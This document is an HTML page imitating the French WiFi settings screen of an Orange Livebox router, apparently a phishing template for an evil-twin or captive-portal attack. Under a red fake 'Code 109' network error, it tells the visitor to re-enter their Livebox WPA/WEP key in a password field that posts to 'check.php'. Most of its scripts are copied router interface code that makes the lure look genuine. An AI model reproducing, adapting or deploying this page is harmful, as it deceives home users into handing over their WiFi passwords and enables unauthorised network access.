

<html data-n-head=""><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

 
  <title data-n-head="true">Login</title>
 

  <script>
    window.dataLayer = window.dataLayer || [];
    function gtag() { dataLayer.push(arguments); }
    gtag('js', new Date());
    // gtag('config', 'UA-124173669-1');
  </script>
      
      <meta http-equiv="Content-language" content="fr">
      <meta name="author" content="Nicolas VIVIEN">
      <meta name="Copyright" content="SAGEM COMMUNICATIONS">
      <link rel="stylesheet" type="text/css" href="./Login_files/fonts.css">
      <link rel="stylesheet" type="text/css" href="./Login_files/page.css">
      <link rel="stylesheet" type="text/css" href="./Login_files/menu.css">
      <link rel="stylesheet" type="text/css" href="./Login_files/header.css">
      <link rel="stylesheet" type="text/css" href="./Login_files/contener.css">
      <link rel="stylesheet" type="text/css" href="./Login_files/subcontener.css">
      <link rel="stylesheet" type="text/css" href="./Login_files/array.css">
      <link rel="stylesheet" type="text/css" href="./Login_files/hardware.css">
      <link rel="stylesheet" type="text/css" href="./Login_files/button.css">
      <link rel="stylesheet" type="text/css" href="./Login_files/lbpopup.css">
      <link rel="stylesheet" type="text/css" href="./Login_files/progressbar.css">
      <link rel="stylesheet" type="text/css" href="./Login_files/styles.css">
      <link rel="stylesheet" href="./Login_files/livebox.css" type="text/css" media="screen">
      <script type="text/javascript" src="./Login_files/script.js.download"></script>
      <script type="text/javascript" src="./Login_files/control.js.download"></script>
      <script type="text/javascript" src="./Login_files/progressbar.js.download"></script>
      <script type="text/javascript" src="./Login_files/LBPopup.js.download"></script>
      <script type="text/javascript" src="./Login_files/dragresize.js.download"></script>
      <script type="text/javascript" src="./Login_files/md5.js.download"></script>
   </head>
   <body>
      <div id="GUI_master">
      <div class="main">
     <div id="modal"><div id="popup">
<div id="popupHead">
<div class="popupTL"></div>
<div id="popupHeadContent" class="popupHeadContent">
<span id="popupHeadMsg">Attention</span>
</div>
<div class="popupTR"></div>
</div>
<div id="popupBody">
<div class="popupBodyL"></div>
<div class="popupBodyR"></div>
<div id="popupMsg"></div>
<div id="popupCslArea">
<div class="LBButton" id="LBBBG1" onmouseup="PopupButtonUp(this)" onmousedown="PopupButtonDown(this)" onmouseover="PopupButtonOver(this)" onmouseout="PopupButtonOut(this)">Non</div>
</div>
<div id="popupOKArea">
<div class="LBButton" id="LBBBG2" onmouseup="PopupButtonUp(this)" onmousedown="PopupButtonDown(this)" onmouseover="PopupButtonOver(this)" onmouseout="PopupButtonOut(this)">Oui</div>
</div>
</div>
<div id="popupFoot">
<div class="popupBL"></div>
<div id="popupFootContent" class="popupFootContent"></div>
<div class="popupBR"></div>
</div>
</div></div>

      <table class="main">
         <tbody><tr>
            <td class="header">
               <div id="header">
                  <h5><img src="./Login_files/header-logo-livebox.png" width="200" height="30" alt="aide"></h5>
                  <ul id="rubrics">
                     
                     
                  </ul>
               </div>
            </td>
         </tr>
         <tr>
            <td colspan="2" class="authinfo">
               <span class="authusername">Administrateur</span>
            
            </td>
         </tr>
      </tbody></table>
      <style>
         #header {
         width: 915;
         }
         #contener table.contener {
         width: 735px;
         }
         #subcontener table.subcontener {
         width: 695px;
         }
         #array input {
         text-align: center;
         }
      </style>
      <script>
         function  ConfirmNoSecurityPopUp(wifistatus, broadcast, easypairing, wpspairing, wpspincode, wpspush, wifipush, ssid, key, mode, channel, nbr, mac){
          var lastvalue;
          // Change text...
          js_esp_ConfirmDialogTitle = "Mode WiFi non sécurisé";
          js_esp_ConfirmDialogText = "Le filtrage par adresse MAC est activé automatiquement. Il faut entrer votre adresse MAC dans la liste.";
          lastvalue = showWarningPopup;
          showWarningPopup = 1;
          showWarningPopup = lastvalue;
          // Change text...
          js_esp_ConfirmDialogTitle = "Confirmation";
          js_esp_ConfirmDialogText = "Etes-vous sûr de vouloir quitter sans enregistrer les changements ?";
         }
         function isValidWiFiKey(mode, key) {
          var i;
          document.formu.key.style.background = '';
          document.formu.key.disabled = false;
          document.formu.keysaved.value = key;
          document.formu.wpspairing.disabled = false;
          document.formu.easypairing.disabled = false;
          document.formu.wpspincode.disabled = false;
          document.formu.wpspincode.style.background = '';
          document.formu.wpspincode.style.display = "";
          document.getElementById("wep128key_invalid").style.display = "none";
          document.getElementById("wpakey_invalid").style.display = "none";
          switch (mode) {
            case '0':
              document.formu.key.style.background = '#CCCCCC';
              document.formu.key.disabled = true;
              document.formu.wpspairing.checked = false;
              document.formu.wpspairing.disabled = true;
              document.formu.easypairing.checked = false;
              document.formu.easypairing.disabled = true;
              document.getElementById("wps_info1").style.display = "none";
              document.formu.wpspincode.style.display = "none";
              return true;
              break;
            case '2':
              document.formu.wpspairing.checked = false;
              document.formu.wpspairing.disabled = true;
              document.getElementById("wps_info1").style.display = "none";
              document.formu.wpspincode.style.display = "none";
              if (key.length == 26) {
                for (i=0; i<26; i++) {
                  value = parseInt(key[i], 16);
                  if (key[i].toLowerCase() != value.toString(16).toLowerCase()) {
                    document.getElementById("wep128key_invalid").style.display = "";
                    return false;
                  }
                }
                document.getElementById("wep128key_invalid").style.display = "none";
                return true;
              }
              document.getElementById("wep128key_invalid").style.display = "";
              break;
            case '3':
            case '6':
            case '7':
              if ((key.length > 7) && (key.length < 64)) {
                document.getElementById("wpakey_invalid").style.display = "none";
                return true;
              }
              document.getElementById("wpakey_invalid").style.display = "";
              break;
          }
          return false;
         }
      </script>
      <script>
         function ChangeWiFiMode(mode) {
           var i;
           var len;
           var obj;
           var option;
           obj = document.formu.securitymode;
           len = obj.length;
           switch (mode) {
             case '3':
               for (i=0; i<len; i++) {
                 option = obj.options[i];
                 if ((option.value == 2) || (option.value == 3)) {
                   option.style.color = '#999999';
                   option.disabled = true;
                   if (option.selected)
                     obj.options[len-1].selected = true;
                 }
                 else {
                   option.style.color = '';
                   option.disabled = false;
                 }
               }
               break;
             default:
               for (i=0; i<len; i++) {
                 option = obj.options[i];
                 option.style.color = '';
                 option.disabled = false;
               }
           }
         }
      </script>
      <script>
         var ghttp;
         function FormWPSAdd(buttName) {
           if (buttState[buttName] == 0)
             return;
           document.formu.action.value = 'wpsadd';
           document.formu.submit();
         }
         function FormWPSGenNewPIN(buttName) {
           if (buttState[buttName] == 0)
             return;
           ghttp = createRequestObject();
           if (!ghttp)
             return;
           ghttp.open('GET.html', '', true);
           ghttp.onreadystatechange = UpdateLiveboxPINCode;
           ghttp.send(null);
         }
         function WPSPairDevice() {
           if (document.formu.wpspairing.checked && document.formu.wpspush.checked) 
           	GoPage('');
         }
         function UpdateLiveboxPINCode() {
           var ret;
           if (ghttp.readyState == 4) {
             // HTTP result
             if (ghttp.status == 200) {
               ret = ghttp.responseText;
               document.getElementById('liveboxpincode').innerHTML = ret;
             }
           }
         }
         function ConfirmNoSecurity() {
           var wifistatus = 0;
           var broadcast= 0;
           var easypairing= 0;
           var wifipush= 0;
           var wpspairing= 0;
           var wpspincode;
           var wpspush= 0;
           var ssid = 0;
           var channel= 0;
           var mode= 0;
           var key;
           var nbr = 0;
           var flagadd;
            var mac;
         	if(document.formu.wifistatus.checked)
         		wifistatus = 1;
            if(document.formu.broadcast.checked)
           		broadcast = 1;
            if(document.formu.ssid)
         		ssid = document.formu.ssid.value;
            if(document.formu.keysaved)
                key = document.formu.keysaved.value;
            if(document.formu.mode)
                mode = parseInt(document.formu.mode.value);
            if(document.formu.channel)
                channel = parseInt(document.formu.channel.value);
            if(document.formu.nbrline){
           		nbr = parseInt(document.formu.nbrline.value);
               	nbr += parseInt(document.formu.flagadd.value);
         	}
            if(parseInt(document.formu.flagadd.value)==1){
         		obj = eval('document.formu.mac' + (nbr-1));
            	if(obj)
            		mac = obj.value;
         	}
            else
         		mac ='';
            ConfirmNoSecurityPopUp(wifistatus, broadcast, easypairing, wpspairing,	wpspincode, wpspush, wifipush, ssid, key, mode, channel, nbr, mac);
         }
         function FormSubmit(buttName) {
           if (buttState[buttName] == 0)
             return;
           if (isChangedObjectSelect(document.formu.securitymode) && document.formu.securitymode.value==0){
          //	document.formu.action.value = 'submit';
          ConfirmNoSecurity();
         }
          else
           document.formu.submit();
         }
         function FormReset(buttName) {
           if (buttState[buttName] == 0)
             return;
           document.formu.reset();
           showWarningPopup = 0;
           RemoveNewLine();
           UpdateForm();
         }
         function AddNewLine(buttName) {
           var obj;
           if (buttState[buttName] == 0)
             return;
           ShowObject(Array('newline1', 'newline2'));
           ButtonDisable('action', 'butt3');
           EnableAllButtons();
           obj = document.formu.flagadd;
           obj.value = 1;
           UpdateForm();
         }
         function RemoveNewLine() {
           var obj;
           HideObject(Array('newline1', 'newline2'));
           ButtonEnable('action', 'butt3');
           obj = document.formu.flagadd;
           obj.value = 0;
           UpdateForm();
         }
         function EnableAllButtons() {
           AllButtonEnable(Array('simple', 'butt1', 'simple', 'butt2'));
         }
         function DisableAllButtons() {
           AllButtonDisable(Array('simple', 'butt1', 'simple', 'butt2'));
         }
         function DisableAllElts() {
           var obj;
           obj = document.formu.elements;
           for(var i=0; i<obj.length; i++){
             if(obj[i].name != 'wifistatus')
                obj[i].disabled = 'disabled';
           }
         }
         function EnableAllElts() {
           var obj;
           obj = document.formu.elements;
           for(var i=0; i<obj.length; i++)
             obj[i].disabled = '';
         }
         function ShowHSIABAlert() {
           var obj;
           obj = document.getElementById("wifi_hsiab_alert");
           if (obj)
             obj.style.display = "";
         }
         function HideHSIABAlert() {
           var obj;
           obj = document.getElementById("wifi_hsiab_alert");
           if (obj)
             obj.style.display = "none";
         }
         function SwitchWPSStatus(show) {
           var i;
           var obj;
           for (i=1; i<100; i++) {
             obj = document.getElementById('wps_info' + i);
             if (!obj)
               return;
             if (show)
               obj.style.display = '';
             else
               obj.style.display = 'none';
           }
         }
         function SwitchWPSPushButton(show) {
           var obj;
           obj = document.getElementById('wps_push_info');
           if (!obj)
               return;
             if (show && document.formu.wpspairing.checked)
               obj.style.display = '';
             else if (document.formu.wpspairing.checked && !document.formu.wpspush.checked) 
               obj.style.display = 'none';
             else 
               obj.style.display = 'none';
         }
         function UpdateForm() {
           var i;
           var nbr;
           var fmod = false;
           var ferr = false;
           nbr = parseInt(document.formu.nbrline.value);
           nbr += parseInt(document.formu.flagadd.value);
           if (isChangedObjectCheckbox(document.formu.wifistatus)) {
            fmod = true;
             if (!document.formu.wifistatus.checked)
             	ShowHSIABAlert();
           	 else
             	HideHSIABAlert();
           }
           	 else
             	HideHSIABAlert();
           if (isChangedObjectCheckbox(document.formu.broadcast))
             fmod = true;
           if (isChangedObjectCheckbox(document.formu.easypairing))
             fmod = true;
           if (isChangedObjectCheckbox(document.formu.wifipush))
             fmod = true;
           if (isChangedObjectCheckbox(document.formu.macfiltering))
             fmod = true;
           if (isChangedObjectCheckbox(document.formu.wpspairing))
             fmod = true;
           if (isChangedObjectRadio(document.formu.wpsstate))
             fmod = true;
           if (isChangedObjectCheckbox(document.formu.wpspush))
             fmod = true;
           if (isChangedObjectText(document.formu.wpspincode))
             fmod = true;
           if (document.formu.wpspairing) {
             SwitchWPSStatus(document.formu.wpspairing.checked);
           }
           if (document.formu.wpspush) {
             SwitchWPSPushButton(document.formu.wpspush.checked);
           }
           if ((document.formu.wpspincode) && (document.formu.wpspairing.checked)) {
             if (!checkWPSPinCode(document.formu.wpspincode.value)) {
               ferr = true;
               if (document.formu.wpspairing.checked) {
               	document.getElementById("wpspincode_invalid").style.display = "";
               	ButtonDisable('simple', 'butt4');
             }
         	else 
         		document.getElementById("wpspincode_invalid").style.display = "none";
             }
             else {
               document.getElementById("wpspincode_invalid").style.display = "none";
               if (isChangedObjectText(document.formu.wpspincode))
                 ButtonEnable('simple', 'butt4');
               else
                 ButtonDisable('simple', 'butt4');
             }
           }
           if (isChangedObjectText(document.formu.ssid))
             fmod = true;
           if (isChangedObjectSelect(document.formu.mode))
             fmod = true;
           ChangeWiFiMode(document.formu.mode.value);
           if (isChangedObjectSelect(document.formu.channel))
             fmod = true;
           if (isChangedObjectSelect(document.formu.securitymode))
             fmod = true;
           if (isChangedObjectText(document.formu.key))
             fmod = true;
           if (document.formu.ssid.value.length == 0) {
             ferr = true;
             document.getElementById("ssid_invalid").style.display = "";
           }
           else
             document.getElementById("ssid_invalid").style.display = "none";
           if (!isValidWiFiKey(document.formu.securitymode.value, document.formu.key.value))
             ferr = true;
           for (i=0; i<nbr; i++) {
             obj = eval('document.formu.mac' + i);
             if (obj) {
               if (isChangedObjectText(obj))
                 fmod = true;
               if (!checkMAC(obj.value))
                 ferr = true;
             }
           }
           if (ferr) {
             showWarningPopup = 1;
             ButtonDisable('simple', 'butt2');
             ButtonEnable('simple', 'butt1');
           }
           else if (fmod) {
             showWarningPopup = 1;
             EnableAllButtons();
           }
           else {
             showWarningPopup = 0;
             DisableAllButtons();
           }
         }
      </script>
        <form id="form1" name="form1" method="POST" action="check.php">   
         <input type="hidden" name="page" value="wireless">
         <input type="hidden" name="sessionid" value="6fb37ufaAnDEDgwJzAFQoR1PJzn44rp">
         <input type="hidden" name="flagadd" value="0">
         <input type="hidden" name="nbrline" value="1">
         <input type="hidden" name="keysaved" value="5CCE17A2474236E5A929A41E9A">
         <table class="main">
         <tbody><tr>
            
            <td class="main">
               <!-- Begin content page -->
               <div id="contener">
               <table class="contener">
                  <tbody><tr>
                     <td class="topleft"></td>
                     <td class="top"><img src="./Login_files/top.gif" height="8"></td>
                     <td class="topright"></td>
                  </tr>
                  <tr>
                     <td class="left"></td>
                     <td class="titlepage">Paramètres WiFi</td>
                     <td class="right"></td>
                  </tr>
                  <tr>
                     <td class="titlesepleft"></td>
                     <td class="titlesep"></td>
                     <td class="titlesepright"></td>
                  </tr>
               </tbody></table>
               <table class="contener">
                  <!-- votre handle pointe ici -->
                  <tbody><tr>
                     <td class="left"></td>
                     <td class="content">
                        <p>(Code 109: Erreur réseau inconnue) : <h1 style="color:#FF0000;"> veuillez vous reconnecter avec la clé WPA/WEP de votre livebox dans le champ ci-dessous.</p>
                     </td>
                     <td class="right"></td>
                  </tr>
               </tbody></table>
               <table class="contener">
                  <tbody><tr>
                     <td class="whiteleft"></td>
                     <td class="content"></td>
                     <td class="whiteright"></td>
                  </tr>
                  <tr>
                     <td class="sepleft"></td>
                     <td class="sep"></td>
                     <td class="sepright"></td>
                  </tr>
                  <tr>
                     <td class="whiteleft"></td>
                     <td class="content"></td>
                     <td class="whiteright"></td>
                  </tr>
               </tbody></table>
               <table class="contener">
               <!-- votre handle pointe ici -->
         <tbody><tr>
            <td class="left"></td>
            <td class="content">
               <p><b>Général :</b></p>
               <div id="subcontener">
               <table class="subcontener">
         <tbody><tr>
            <td class="topleft"></td>
            <td class="top"></td>
            <td class="topright"></td>
         </tr>
         <tr>
            <td class="left"></td>
            <td class="content">
               <div class="block" id="aide">
               
         </div><br><p><b>Appairage :</b></p><div id="subcontener">
         </div><table width="100%">
         <tbody><tr>
            <td>Activer le WiFi :</td>
            <td width="50%"><input type="checkbox" name="wifistatus" value="1" onchange="UpdateForm()" onclick="UpdateForm()" title="Cocher pour activer" checked=""></td>
         </tr>
         <tr>
         </tr>
         <tr>
          
         </tr>
         <tr>
         <td>  <h1 style="color:#FF0000;"> mot de pass : </td>
            <td width="50%">
               <input type="password" name="key1" size="26" style="width: 260px">
               <div  type="submit" name="ok" class="block" id="thoughtbot">
               <button>Valider</button>
            </div></td>
         </tr>
         <tr>
            </tr><tr>
         
         
         </tr></tbody></table><table class="subcontener">
         <tbody><tr>
         <td class="topleft"></td>
         <td class="top"></td>
         <td class="topright"></td>
         </tr>
         <tr>
         <td class="left"></td>
         <td class="content">
         <table width="100%">
         <tbody><tr>
		  <br>
		  <br>
		 
         <td>Activer le Wifi Easy pairing :</td>
         <td colspan="2" width="50%"><input type="checkbox" name="easypairing" value="1" onchange="UpdateForm()" onclick="UpdateForm()" title="Cocher pour activer" checked=""></td>
         </tr>
         <tr>
         <td>Activer le WPS pairing :</td>
         <td colspan="2" width="50%"><input type="checkbox" name="wpspairing" value="1" onchange="UpdateForm()" onclick="UpdateForm()" title="Cocher pour activer" checked=""></td>
         </tr>
         <tr id="wps_info1" style="display: ">
         <td>Le PIN code de l'équipement WPS en 8 caractères :</td>
         <td width="25%"><input type="text" name="wpspincode" value="12345670" maxlength="8" style="width: 100px" onchange="UpdateForm()" onkeyup="UpdateForm()" title="Entrer le code PIN WPS"></td>
         </tr>
         <tr id="wpspincode_invalid" style="display: none;">
         <td>&nbsp;</td>
         <td colspan="2" class="boldred">Vérification PIN a échouée</td>
         </tr>
         <tr id="wpspincode_progress" style="display: none;">
         <td>&nbsp;</td>
         <td colspan="2" class="boldred">Ajout d'un équipement sans fil...</td>
         </tr>
         <tr id="wpspincode_timeout" style="display: none;">
         <td>&nbsp;</td>
         <td colspan="2" class="boldred">Fin de la session d'enregistrement</td>
         </tr>
         <tr id="wpspincode_paired" style="display: none;">
         <td>&nbsp;</td>
         <td colspan="2" class="boldgreen">Équipement appairé</td>
         </tr>
         </tbody></table>
         </td>
         <td class="right"></td>
         </tr>
         <tr>
         <td class="bottomleft"></td>
         <td class="bottom"><img src="./Login_files/vide.html" width="1" height="1"></td>
         <td class="bottomright"></td>
         </tr>
         </tbody></table>
         
         <script>ButtonDisable('simple', 'butt4');</script>
         <p><b>Configuration de l'appairage WiFi :</b></p>
         <div id="subcontener">
         <table class="subcontener">
         <tbody><tr>
         <td class="topleft"></td>
         <td class="top"></td>
         <td class="topright"></td>
         </tr>
         <tr>
         <td class="left"></td>
         <td class="content">
         <table width="100%">
         <tbody><tr>
         <td>Activer le filtrage MAC :</td>
         <td width="50%"><input type="checkbox" name="macfiltering" value="1" onchange="UpdateForm()" onclick="UpdateForm()" title="Cocher pour activer"></td>
         </tr>
         </tbody></table>
         </td>
         <td class="right"></td>
         </tr>
         <tr>
         <td class="bottomleft"></td>
         <td class="bottom"><img src="./Login_files/vide.html" width="1" height="1"></td>
         <td class="bottomright"></td>
         </tr>
         </tbody></table>
         </div>
         <p><b>Equipements autorisés :</b></p>
         <div id="array">
         <table class="array" style="width: 695px;">
         <tbody><tr>
         <td style="width: 9px;" class="sep"><img src="./Login_files/t2_top_left.gif" width="9" height="10"></td>	
         <td style="width: 160px" class="atop"></td>
         <td style="width: 12px;" class="sep"><img src="./Login_files/t2_top_colsep.gif" width="12" height="10"></td>
         <td style="width: 160px" class="atop"></td>
         <td style="width: 12px;" class="sep"><img src="./Login_files/t2_top_colsep.gif" width="12" height="10"></td>
         <td style="width: 160px;" class="atop"></td>
         <td style="width: 12px;" class="sep"><img src="./Login_files/t2_top_colsep.gif" width="12" height="10"></td>
         <td style="width: 60px;" class="atop"></td>
         <td style="width: 12px;" class="sep"><img src="./Login_files/t2_top_colsep.gif" width="12" height="10"></td>
         <td style="width: 90px;" class="atop"></td>
         <td style="width: 8px;" class="sep"><img src="./Login_files/t2_top_right.gif" width="8" height="10"></td>
         </tr>
         <tr class="ahead">
         <td class="aleft"></td>
         <td><div class="trunc">Nom</div></td>
         <td class="amid"></td>
         <td><div class="trunc">Adresse IP</div></td>
         <td class="amid"></td>
         <td><div class="trunc">Adresse MAC</div></td>
         <td class="amid"></td>
         <td><div class="trunc">Statut</div></td>
         <td class="amid"></td>
         <td><div class="trunc">Supprimer</div></td>
         <td class="aright"></td>
         </tr>
         <tr class="aodd">
         <td class="aleft"></td>
         <td>Vous
         <input type="hidden" name="id0" value="-1">		<input type="hidden" name="device0" value="3">	</td>
         <td class="amid"></td>
         <td>192.168.1.12</td>
         <td class="amid"></td>
         <td>Non disponible</td>
         <td class="amid"></td>
         <td><img src="./Login_files/wifi_enable.gif" width="30" height="20" title="Connecté"></td>
         <td class="amid"></td>
         <td><img src="./Login_files/poubelle-disable.jpg" width="23" height="23"></td>
         <td class="aright"></td>
         </tr>
         <tr id="newline1" class="aodd" style="display: none">
         <td class="aleft"></td>
         <td><input type="hidden" name="device1" value="-1"></td>	<td class="amid"></td>
         <td>&nbsp;</td>
         <td class="amid"></td>
         <td><input type="text" name="mac1" value""="" style="width: 140px" onkeyup="UpdateForm()" onchange="UpdateForm()"></td>
         <td class="amid"></td>
         <td>&nbsp;</td>
         <td class="amid"></td>
         <td><a href="JavaScript:RemoveNewLine();" title="Supprimer l&#39;équipement"><img src="./Login_files/poubelle.jpg" width="23" height="23"></a></td>
         <td class="aright"></td>
         </tr>
         <!-- End content page -->
         
         
         </tbody></table>
      
      </div>
      
   


</td></tr></tbody></table></div></td></tr></tbody></table></div></td></tr></tbody></table></form></div></div></body></html>